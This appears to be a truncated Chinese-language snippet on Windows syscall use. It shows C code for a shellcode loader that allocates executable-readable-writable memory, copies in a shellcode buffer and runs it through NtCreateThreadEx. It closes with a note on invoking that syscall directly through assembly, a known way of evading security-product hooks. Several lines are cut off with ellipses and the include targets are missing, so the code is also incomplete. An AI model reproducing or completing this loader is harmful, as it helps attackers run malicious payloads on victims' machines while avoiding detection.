syscall调用
#include
#include
EXTERN_C NTSTATUS NtCreateThreadEx
(
OUT PHANDLE...SizeOfStackCommit,
IN SIZE_T SizeOfStackReserve,
OUT PVOID lpBytesBuffer
);
int main()
{
HANDLE pHandle...PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
HMODULE hModule = LoadLibrary(L"ntdll.dll");
pHandle...= GetCurrentProcess();
NtCreateThreadEx(&tHandle, 0x1FFFFF, NULL, pHandle, exec, NULL, FALSE,
NULL..., NULL, NULL, NULL);
Sleep(1000);
CloseHandle(tHandle);
CloseHandle(pHandle);
}
通过汇编直接NtCreateThreadEx